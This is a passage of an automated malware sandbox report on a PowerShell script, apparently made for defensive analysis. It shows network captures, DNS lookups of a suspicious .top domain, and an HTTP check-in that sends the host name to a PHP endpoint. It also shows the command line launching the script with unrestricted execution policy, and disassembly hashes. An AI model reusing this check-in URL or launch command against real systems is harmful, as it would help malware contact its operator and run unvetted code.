                                                                                                            Dec 30, 2024 16:14:02.774584055 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.774599075 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.774630070 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.780858040 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.780873060 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.780888081 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.780930996 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.780965090 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.787076950 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.787103891 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.787173986 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.787228107 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.787241936 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.787282944 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.793545008 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.793560982 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.793576956 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.793607950 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.799768925 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.799786091 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.799799919 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.799835920 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.799873114 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.805968046 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.805982113 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.806024075 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.839792967 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.839807034 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.839852095 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.839907885 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.839924097 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.839939117 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.839963913 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.842032909 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.842046976 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.842103004 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.842473984 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.842488050 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.842515945 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.848391056 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.848407030 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.848422050 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.848445892 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.848473072 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.854568958 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.854583025 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.854626894 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.854675055 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.854696035 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.854746103 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.860872984 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.860889912 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.860904932 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.860939980 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.867697954 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.867712021 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.867765903 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:03.085488081 CET4973080192.168.2.445.61.136.138
                                                                                                            Dec 30, 2024 16:14:03.086210966 CET4973180192.168.2.4142.250.185.132

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 30, 2024 16:14:00.619612932 CET6470953192.168.2.41.1.1.1
                                                                                                            Dec 30, 2024 16:14:01.341732025 CET53647091.1.1.1192.168.2.4
                                                                                                            Dec 30, 2024 16:14:01.976661921 CET6336753192.168.2.41.1.1.1
                                                                                                            Dec 30, 2024 16:14:01.983480930 CET53633671.1.1.1192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 30, 2024 16:14:00.619612932 CET192.168.2.41.1.1.10x90e9Standard query (0)kdemjgebjimkanl.topA (IP address)IN (0x0001)false
                                                                                                            Dec 30, 2024 16:14:01.976661921 CET192.168.2.41.1.1.10xd44Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 30, 2024 16:14:01.341732025 CET1.1.1.1192.168.2.40x90e9No error (0)kdemjgebjimkanl.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                            Dec 30, 2024 16:14:01.983480930 CET1.1.1.1192.168.2.40xd44No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • kdemjgebjimkanl.top
                                                                                                            • www.google.com

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.44973045.61.136.138802008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 30, 2024 16:14:01.363929987 CET216OUTGET /du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                            Host: kdemjgebjimkanl.top
                                                                                                            Connection: Keep-Alive
                                                                                                            Dec 30, 2024 16:14:01.975390911 CET166INHTTP/1.1 302 Found
                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                            Date: Mon, 30 Dec 2024 15:14:01 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: keep-alive
                                                                                                            Location: http://www.google.com


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.449731142.250.185.132802008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 30, 2024 16:14:01.990700006 CET159OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                            Host: www.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Dec 30, 2024 16:14:02.666331053 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 30 Dec 2024 15:14:02 GMT
                                                                                                            Expires: -1
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QRSgWh_fnsVpcixOprXVSA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Server: gws
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Set-Cookie: AEC=AZ6Zc-UenYcFCWxbxcBOMXfId6FH7s6YhgsnRioM3SzV7_rNnD6C6bz8_g; expires=Sat, 28-Jun-2025 15:14:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                            Set-Cookie: NID=520=bdLl0HFSenvRo6h1LK6O3tFeWIESbLvMmK6MIcoEwKEHQlLRotj6yCp_a-yuumNhwZv8d-Dnip-FI169wjHl-jT--VfIPXYwQcOPdU2RjxcCeGTVkuXZmrC2poPeHafAa5VtUWizvnQ_WNGjtLalstT4ll_aAtxQIMdCp6VHzeE8YMsciAiHPRKT49AE1y7vsnvEWOxL; expires=Tue, 01-Jul-2025 15:14:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                            Accept-Ranges: none
                                                                                                            Vary: Accept-Encoding
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Data Raw: 33 36 35 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                            Data Ascii: 3651<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                            Dec 30, 2024 16:14:02.666351080 CET224INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                            Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
                                                                                                            Dec 30, 2024 16:14:02.666384935 CET1236INData Raw: 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70
                                                                                                            Data Ascii: <meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var _g={kEI:'urhyZ9bzH7eJxc8Psc-pmAg',kEXPI:'0,3700256,693,435,538661,2872,28
                                                                                                            Dec 30, 2024 16:14:02.666402102 CET224INData Raw: 2c 32 2c 32 32 2c 33 32 34 2c 36 33 33 2c 32 2c 37 32 37 2c 35 2c 39 31 35 2c 31 2c 36 33 31 2c 31 2c 35 34 2c 39 30 38 2c 35 34 31 2c 31 2c 31 30 38 2c 33 35 2c 32 32 2c 36 36 2c 33 31 34 2c 38 2c 32 33 33 2c 33 2c 31 31 2c 34 39 33 2c 31 32 39
                                                                                                            Data Ascii: ,2,22,324,633,2,727,5,915,1,631,1,54,908,541,1,108,35,22,66,314,8,233,3,11,493,1298,80,178,58,259,152,361,430,2,7,1,274,489,110,232,179,680,61,32,39,71,603,243,476,78,361,55,1,132,305,340,488,74,146,209,36,50,243,2,1852,1,23
                                                                                                            Dec 30, 2024 16:14:02.666416883 CET1236INData Raw: 37 2c 32 2c 31 30 31 2c 31 33 38 2c 31 31 38 35 2c 32 2c 36 2c 36 36 38 2c 32 34 33 37 2c 35 38 32 2c 32 31 33 34 38 37 39 33 2c 33 37 31 39 38 2c 31 38 2c 32 30 30 34 2c 31 34 38 30 2c 38 37 35 2c 35 32 33 31 2c 34 35 2c 31 35 35 2c 35 35 33 2c
                                                                                                            Data Ascii: 7,2,101,138,1185,2,6,668,2437,582,21348793,37198,18,2004,1480,875,5231,45,155,553,1663,111,8,2065,3,1202,57,540,17,294,5985731,2038088,3',kBL:'xroT',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.
                                                                                                            Dec 30, 2024 16:14:02.666433096 CET1236INData Raw: 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                            Data Ascii: f(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d
                                                                                                            Dec 30, 2024 16:14:02.666460037 CET1236INData Raw: 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f
                                                                                                            Data Ascii: bute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-l
                                                                                                            Dec 30, 2024 16:14:02.666476011 CET1236INData Raw: 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 74 6f 20 2e 67 62 6d 2c 2e 67 62 74 6f 20 23 67 62 73 7b 74 6f 70 3a 32 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65
                                                                                                            Data Ascii: hadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-
                                                                                                            Dec 30, 2024 16:14:02.666491985 CET704INData Raw: 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70 61 6e 23 67 62 67 34 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 67 62 74 73
                                                                                                            Data Ascii: lay:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*dis
                                                                                                            Dec 30, 2024 16:14:02.666508913 CET1236INData Raw: 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 37 70 78 20 2d
                                                                                                            Data Ascii: url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-color:#4c4c4c;background-image:no
                                                                                                            Dec 30, 2024 16:14:02.671355963 CET1236INData Raw: 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                            Data Ascii: gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.gbto #gbi5{background-position:-


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:10:13:54
                                                                                                            Start date:30/12/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:10:13:54
                                                                                                            Start date:30/12/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B7A8126 Relevance: .5, Instructions: 475COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 651476c922c9f0be976d68fcd91bf30f958328ced4270350fb6d17b1d430d04d
                                                                                                              • Instruction ID: e3c3c27561eb2cef66e6bc7b3ea33e7152b5e9e3e284d1649525898fa513be3b
                                                                                                              • Opcode Fuzzy Hash: 651476c922c9f0be976d68fcd91bf30f958328ced4270350fb6d17b1d430d04d
                                                                                                              • Instruction Fuzzy Hash: 28F1A630A09B8D8FEBA8DF28C8657E937E1FF54310F44426EE85DC76A5DB3499418B81
                                                                                                              Function 00007FFD9B7A8ED2 Relevance: .5, Instructions: 461COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91b655fb731296faa830d0581da863d987d572fc47539c3e6f93c68a232fdcfd
                                                                                                              • Instruction ID: b8c334069e5eae21dbc4feb3775193599aa64da542fbf38fe7fa1f4b214b4d41
                                                                                                              • Opcode Fuzzy Hash: 91b655fb731296faa830d0581da863d987d572fc47539c3e6f93c68a232fdcfd
                                                                                                              • Instruction Fuzzy Hash: 63E1B430A09A4E8FEFA8DF28C8697F937D1FF54310F14426AD84DC72A5DE78A9518781
                                                                                                              Function 00007FFD9B79B5D0 Relevance: .5, Instructions: 478COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9311593dfaa316a7568c404e790a89a0ed9466349b1b13d28b11c01df131c686
                                                                                                              • Instruction ID: 40b62d941768f1fb0c1eb6ec47e492cc6dad175edeb463d4e78f287a19c6c26b
                                                                                                              • Opcode Fuzzy Hash: 9311593dfaa316a7568c404e790a89a0ed9466349b1b13d28b11c01df131c686
                                                                                                              • Instruction Fuzzy Hash: 93E1A330A19A4D8FDF98DF9CC455AA977F1FF68300F15426AD449D72A6CA34EC82C781
                                                                                                              Function 00007FFD9B7A8AE6 Relevance: .3, Instructions: 333COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6563f10cc66088b40ce795fa2face6d699761d4ffa8de82cf44cb20ffa86b4a
                                                                                                              • Instruction ID: 2e3a87e997ba6890c55024a440cf9c16d2ed6757ad7c850faaadfef70eb1ef60
                                                                                                              • Opcode Fuzzy Hash: e6563f10cc66088b40ce795fa2face6d699761d4ffa8de82cf44cb20ffa86b4a
                                                                                                              • Instruction Fuzzy Hash: 34B1C63060DB8D4FDBA9DF28C8557E93BE1FF55310F54426AE84DC72E2CA3499458B82
                                                                                                              Function 00007FFD9B7A29C9 Relevance: .2, Instructions: 248COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd705f4d9c6f208395defbb81afa0e5445cc13cbc7fa01735f1afca0892f3084
                                                                                                              • Instruction ID: c8a7f897d9fa572edb23579c86f62a3fb4da42fb158984487f2c1521e30bb0b2
                                                                                                              • Opcode Fuzzy Hash: fd705f4d9c6f208395defbb81afa0e5445cc13cbc7fa01735f1afca0892f3084
                                                                                                              • Instruction Fuzzy Hash: 51714C62A0EBC90FE7755BE85D265B43FA0EF56300F0942BFE498871F7D914A905C782
                                                                                                              Function 00007FFD9B67E620 Relevance: .1, Instructions: 128COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1779786947.00007FFD9B67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B67D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b67d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d86ac78abcfe895600cf2ee21ec501c1621500111ee558cbfff96558c43deba
                                                                                                              • Instruction ID: da32ceb85bc3ca634e790e3604676889f68c5a4997d8645d789f0e792e969895
                                                                                                              • Opcode Fuzzy Hash: 4d86ac78abcfe895600cf2ee21ec501c1621500111ee558cbfff96558c43deba
                                                                                                              • Instruction Fuzzy Hash: D541037140EBC44FE766CB2998559523FF4EF56220B1A05EFD0C8CF1A3D625A84AC7A2
                                                                                                              Function 00007FFD9B7A2F98 Relevance: .1, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54bc6c12403e71f48db1621e5bc5b2f667c4e421b57bf486df0bf5033f21a88c
                                                                                                              • Instruction ID: 0d108b4e9650c092a77b19c33300900894a16802f6c9376c3c81630ef68d3175
                                                                                                              • Opcode Fuzzy Hash: 54bc6c12403e71f48db1621e5bc5b2f667c4e421b57bf486df0bf5033f21a88c
                                                                                                              • Instruction Fuzzy Hash: 0F213B7190CB4C4FDB58DF9CD84A7E97BE1EB96321F04426BD048C31A6D674A44ACB91
                                                                                                              Function 00007FFD9B7A85E4 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf5c1b2ad3012c6f7f9099ee8d464ceea1a87a655089a266473bb9582741947d
                                                                                                              • Instruction ID: e29f43cdac328fe79f04cbc99b21e3bca301c3e8b9cda9ee6ffbeb8789d1f08d
                                                                                                              • Opcode Fuzzy Hash: bf5c1b2ad3012c6f7f9099ee8d464ceea1a87a655089a266473bb9582741947d
                                                                                                              • Instruction Fuzzy Hash: C5312130A1A64D8EFBF89F54CC19BF93290FF45719F810239D44E861B3DA386A45CB12
                                                                                                              Function 00007FFD9B795095 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ab6da5e3b7a10985376652421062a6ddadee4a469fb2f858efbaa927a2b489e
                                                                                                              • Instruction ID: 49c6b4e2a87d3571d9cbe67c62f0d1724114ef7dd989a2e91f75bf6ebbfe3878
                                                                                                              • Opcode Fuzzy Hash: 0ab6da5e3b7a10985376652421062a6ddadee4a469fb2f858efbaa927a2b489e
                                                                                                              • Instruction Fuzzy Hash: C501677121CB0C8FD748EF0CE451AA9B7E0FB95365F10056DE58AC36A5D636E881CB45
                                                                                                              Function 00007FFD9B7A2DE0 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
